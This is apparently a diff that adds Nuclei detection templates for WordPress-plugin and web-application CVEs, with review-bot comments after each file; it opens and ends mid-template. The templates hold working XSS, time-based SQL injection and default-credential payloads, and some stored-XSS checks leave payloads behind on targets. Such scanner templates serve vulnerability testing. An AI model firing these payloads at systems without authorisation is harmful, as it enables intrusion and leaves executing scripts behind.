|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="ssc"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="file1"; filename=""
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="attnam1"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061
|
||||||
|
Content-Disposition: form-data; name="atttmp1"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------34025600472463336623659912061--
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- '<details/open/ontoggle=alert(document.domain)>'
|
||||||
|
- 'clients/listclients.php?'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="csrfToken" value="([0-9a-zA-Z]+)"'
|
||||||
|
internal: true
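Review bot: This is a stored-XSS check that writes a client named `{{randstr}}<details/open/ontoggle=alert(document.domain)>` into the target's database and never removes it, so every scan leaves an executing payload behind for real users of listclients.php; the description should say so (e.g. `Note: this template creates a client record containing the payload; remove it after testing.`) and, if webTareas exposes a delete action for clients, a fourth request keyed on the new record's id should clean it up. The csrf extractor has no `part`, so the regex runs against all three bodies; `part: body_2` ties it to the editclient.php form that carries `csrfToken` (hedged on nuclei extractor indexing). `max-request: 3` and `cookie-reuse: true` are correct for the flow shown.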
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2022-45365
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
|
||||||
|
reference:
|
||||||
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test
|
||||||
|
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability
|
||||||
|
- https://wordpress.org/plugins/stock-ticker/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-45365
|
||||||
|
remediation: Fixed in version 3.23.3
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2022-45365
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
publicwww-query: "/wp-content/plugins/stock-ticker/"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Stock Ticker Fatal"
|
||||||
|
- "<IMG SRC=X ONERROR="
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
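Review bot: `verified: "true"` is a quoted string while sibling templates use the boolean `verified: true`, and the `wpscan` tag is not backed by a wpscan reference (the sources are Wordfence and Patchstack), so either drop the tag or add the wpscan advisory if one exists. The body match on `<IMG SRC=X ONERROR=` relies on the plugin upper-casing the endpoint value, which is also why `alert` is entity-encoded in the payload; a one-line comment above the raw request, `# plugin upper-cases the endpoint value, hence the entity-encoded alert()`, would keep the next maintainer from "fixing" the payload.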
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2022-47075
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Smart Office Web 20.28 - Information Disclosure
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-47075
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2022-47075
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,smart-office,info,exposure
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ExportReportingManager.aspx"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "application/CSV")'
|
||||||
|
- 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
|
||||||
|
condition: and
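Review bot: `contains(content_type, "application/CSV")` is case-sensitive, so a server that sends `application/csv` or `text/csv` is missed; `contains(tolower(content_type), "csv")` covers the variants. The description names two endpoints (ExportEmployeeDetails.aspx and ExportReportingManager.aspx) and an `action name parameter`, but the template only requests `ExportReportingManager.aspx` with no parameter; either add the second path (and `max-request: 2`) or narrow the description to what is tested. `metadata` has no `max-request` and `classification` has no `cwe-id`; the issue as described is a download without authorization, so a missing-authorization CWE such as CWE-862 fits, but check it against NVD.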
|
|
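--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0334.yaml
@@ -0,0 +1,34 @@
+id: CVE-2023-0334
+
+info:
+  name: ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin
+  reference:
+    - https://wpscan.com/vulnerability/b027a8db-0fd6-444d-b14a-0ae58f04f931
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0334
+  remediation: Fixed in version 3.6.3
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    max-request: 2
+    verified: true
+    publicwww-query: "/wp-content/plugins/shortpixel-adaptive-images/"
+  tags: cve,cve2023,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "shortpixel") && contains(body, "</script><img src=1 onerror=alert(document.domain)>")'
+        condition: and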
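Review bot: `max-request: 2` does not match the single path under `http`; the template issues one request, so this should read `max-request: 1`. The `remediation` key is placed after `reference` here while the sibling templates in this commit put it directly after `description`; a consistent field order keeps the templates easy to diff.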
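--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0600.yaml
@@ -0,0 +1,40 @@
+id: CVE-2023-0600
+
+info:
+  name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
+  author: r3Y3r53
+  severity: high
+  description: |
+    The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
+  remediation: Fixed in version 6.9
+  reference:
+    - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0600
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-0600
+    cwe-id: CWE-89
+  metadata:
+    max-request: 1
+    verified: true
+    public-www: "/wp-content/plugins/wp-stats-manager/"
+  tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli
+
+variables:
+  str: '{{rand_int(100000, 999999)}}'
+
+http:
+  - raw:
+      - |
+        @timeout: 30s
+        GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(body, "sleep(10)")'
+        condition: and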
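Review bot: The third dsl line `'contains(body, "sleep(10)")'` cannot be satisfied by this request: the injected value uses `sleep(6)` and nothing in the template produces the string `sleep(10)`, so with `condition: and` the template will not match even on a vulnerable host. Either drop that line and rely on `duration>=6` together with a plugin-specific body marker, or align it with the value actually sent. Separately, the metadata key `public-www:` differs from the `publicwww-query:` used by the other templates in this commit and is likely to be ignored by tooling that reads the standard key.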
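--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0602.yaml
@@ -0,0 +1,37 @@
+id: CVE-2023-0602
+info:
+  name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
+  reference:
+    - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0602
+    - https://wordpress.org/plugins/twittee-text-tweet/
+  metadata:
+    verified: true
+    max-request: 2
+  tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "text/html")'
+          - 'contains(body_2, "<script>alert(document.domain)</script>") && contains(body_2, "twittee")'
+        condition: and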
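Review bot: The second raw request targets `/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5...`, which does not look like a page belonging to the Twittee Text Tweet plugin named in `info.name`, while the matcher still requires `contains(body_2, "twittee")`; this reads like a request carried over from another template, so please confirm the affected admin page before merge. There is also no `classification:` block (cvss metrics, cve-id, cwe-id) although the sibling templates carry one; `cwe-id: CWE-79` would be the expected entry for a reflected XSS. A blank line between `id:` and `info:` would match the layout of the other files.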
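--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0777.yaml
@@ -0,0 +1,66 @@
+id: CVE-2023-0777
+
+info:
+  name: modoboa 2.0.4 - Admin TakeOver
+  author: r3Y3r53
+  severity: critical
+  description: |
+    Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
+  remediation: update to version 2.0.4
+  reference:
+    - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/
+    - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-0777
+    cwe-id: CWE-305
+    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    shodan-query: html:"Modoboa"
+    fofa-query: body="Modoboa"
+  tags: modoboa,default-login
+
+http:
+  - raw:
+      - |
+        GET /accounts/login/ HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /accounts/login/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F
+
+      - |
+        GET /dashboard/ HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      username:
+        - admin
+      password:
+        - password
+    attack: pitchfork
+
+    cookie-reuse: true
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(content_type_3, "text/html")'
+          - 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: header
+        name: csrftoken
+        internal: true
+        group: 1
+        regex:
+          - csrftoken=([A-Za-z0-9]+)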
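Review bot: `info.name` reads `modoboa 2.0.4 - Admin TakeOver` while the description and remediation say the issue affects versions prior to 2.0.4 and is fixed in 2.0.4; the name should read `modoboa < 2.0.4 - Admin TakeOver`. The tags omit `cve,cve2023` even though the template id is a CVE, and metadata has no `max-request` (three raw requests, so `max-request: 3`); both are provided by the sibling templates in this commit. A one-line comment above `extractors` noting that `csrftoken` is taken from the first response's headers would help the next reader see why `part: header` is used.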
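--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0900.yaml
@@ -0,0 +1,63 @@
+id: CVE-2023-0900
+
+info:
+  name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection
+  author: r3Y3r53
+  severity: high
+  description: |
+    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
+  reference:
+    - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1
+    - https://github.com/WPPlugins/ap-pricing-tables-lite
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0900
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-0900
+    cwe-id: CWE-89
+  metadata:
+    max-request: 3
+    verified: true
+    publicwww-query: "wp-content/plugins/ap-pricing-tables-lite"
+  tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 20s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_3>=5'
+          - 'status_code_3 == 200'
+          - 'contains(body_3, "Security check")'
+          - 'contains(body_2, "ap-pricing-tables-lite")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '_wpnonce=([0-9a-z]+)">Log Out'
+        internal: true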
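Review bot: The extractor regex `'_wpnonce=([0-9a-z]+)">Log Out'` captures the nonce of the Log Out link, yet the body matcher for the third response requires `"Security check"`, which looks like a failed-nonce message; taken together the match appears to rely on the nonce being rejected, so please confirm that the delay behind `duration_3>=5` is produced by the `copy_table` handler and not by an unrelated slow response. If the plugin's own nonce is rendered on the page fetched in request 2, extracting it from `body_2` would make the check unambiguous. A short comment above `extractors` stating which nonce is being reused and why would also help.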
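--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-0947.yaml
@@ -0,0 +1,34 @@
+id: CVE-2023-0947
+
+info:
+  name: Flatpress < 1.3 - Path Traversal
+  author: r3Y3r53
+  severity: critical
+  description: |
+    Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
+  reference:
+    - https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0947
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-0947
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1189292869
+  tags: cve,cve2023,lfi,flatpress,listing
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fp-content/"
+      - "{{BaseURL}}/flatpress/fp-content/"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>Index of /fp-content</title>")'
+        condition: and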
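Review bot: The matcher only establishes that `fp-content/` has directory listing enabled (`<title>Index of /fp-content</title>`); it does not exercise the path traversal described under `info.description`, so a host with listing enabled but the traversal patched is reported as vulnerable and a patched-listing host with the traversal intact is missed. Either state in the description that the template detects the exposed listing as a precondition, or adjust the check to the traversal itself. `metadata` also lacks `max-request: 2` for the two paths, and the `lfi` tag sits oddly next to a CWE-22 classification and a listing check.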
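--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-1263.yaml
@@ -0,0 +1,52 @@
+id: CVE-2023-1263
+
+info:
+  name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
+  reference:
+    - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1263
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure
+    - https://wordpress.org/plugins/cmp-coming-soon-maintenance/
+  remediation: Fixed in version 4.1.7
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-1263
+    cwe-id: CWE-862
+  metadata:
+    max-request: 1
+    verified: true
+    publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/"
+  tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=cmp_get_post_detail&id=1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"img":'
+          - '"date":'
+          - '"title":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200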
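Review bot: The header word `application/json` is the only unquoted matcher value in this commit; the sibling templates quote such strings (`- "application/json"`), and quoting also keeps the value safe from any future `:` or `#` in it. The request hard-codes `id=1`, so the check presumably depends on a post with that ID still existing; on a site where it was deleted the template reports nothing even if the plugin is vulnerable, which is worth a one-line comment above the raw request.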
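--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-1408.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-1408
+
+info:
+  name: Video List Manager <= 1.7 - SQL Injection
+  author: r3Y3r53
+  severity: critical
+  description: |
+    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
+  reference:
+    - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
+    - https://wordpress.org/plugins/video-list-manager/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1408
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-1408
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+  tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        @timeout: 15s
+        GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=7'
+          - 'status_code_2 == 200'
+          - 'contains_all(body_2, "Edit Video","Youtube</option>")'
+        condition: and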
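Review bot: `metadata` has no `max-request`, although the template sends two raw requests and the sibling templates in this commit declare it; add `max-request: 2`. The tags omit `wpscan` even though the primary reference is a WPScan advisory, unlike the other wpscan-sourced templates here. With `redirects: true` on a time-based check, a redirect chain adds to `duration_2`; a comment noting that the 7-second threshold was chosen with that in mind would reassure readers.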
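--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-1780.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-1780
+
+info:
+  name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+  remediation: Fixed in version 4.5.3
+  reference:
+    - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1780
+  classification:
+    cve-id: CVE-2023-1780
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(content_type_2, "text/html")'
+          - 'contains(body_2, "re not allowed to view")'
+          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
+        condition: and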
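Review bot: The tags line contains `wp-scan`, which does not match the `wpscan` tag used by every other template in this commit, so filtering on `wpscan` would skip this file; change it to `wpscan` (the line already carries `wpscan` once, so the extra entry can simply be dropped). The dsl line `'contains(body_2, "re not allowed to view")'` is a fragment of a permission-denied message, and it is not obvious why the reflection is expected on that page; a comment such as `# payload is reflected in the tab error message, hence the denied-page text` above the matcher would explain the combination.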
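--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-1880.yaml
@@ -0,0 +1,35 @@
+id: CVE-2023-1880
+
+info:
+  name: Phpmyfaq v3.1.11 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
+  remediation: Fixed in 3.1.12 Version.
+  reference:
+    - https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1880
+    - https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.html:"phpmyfaq"
+  tags: cve,cve2023,xss,phpmyfaq
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
+          - 'contains(content_type, "text/html")'
+        condition: and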
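Review bot: `remediation: Fixed in 3.1.12 Version.` is phrased differently from the `Fixed in version X` wording used by the sibling templates; `remediation: Fixed in version 3.1.12` keeps the field consistent and greppable. `info.name` pins `v3.1.11` while the remediation implies all releases before 3.1.12 are affected; `Phpmyfaq < 3.1.12` would state the affected range rather than a single version, if that is what the advisory says.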
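--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-2009.yaml
@@ -0,0 +1,56 @@
+id: CVE-2023-2009
+
+info:
+  name: Pretty Url <= 1.5.4 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
+  reference:
+    - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2009
+    - https://wordpress.org/plugins/pretty-url/
+  metadata:
+    verified: true
+    max-request: 3
+  tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss
+
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log=((username))&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
+
+    redirects: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
+          - 'contains(body_3, "prettyurls")'
+        condition: and
+
+    extractors:
+      - type: regex
+        internal: true
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - 'name="_wpnonce" value="([0-9a-z]+)" />'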
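Review bot: The login body in the first raw request reads `log=((username))&pwd={{password}}`, so the username is never substituted and the login step cannot succeed, which makes the whole chain a guaranteed non-match; it should be `log={{username}}&pwd={{password}}&wp-submit=Log+In` as in the other templates. Because the third request writes the payload into the plugin's settings (this is a stored XSS), the template changes target state rather than only reading it; adding the `intrusive` tag and a sentence in the description makes that side effect explicit to operators. There are also two consecutive blank lines before `http:` where the siblings use one.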
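--- /dev/null
+++ b/PATH_NOT_SHOWN/CVE-2023-2779.yaml
@@ -0,0 +1,44 @@
+id: CVE-2023-2779
+
+info:
+  name: Super Socializer < 7.13.52 - Cross-Site Scripting
+  author: r3Y3r53
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
+  remediation: Fixed in version 7.13.52
+  reference:
+    - https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2779
+    - https://wordpress.org/plugins/super-socializer/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 2
+    publicwww-query: "/wp-content/plugins/super-socializer/"
+  tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer
+
+http:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
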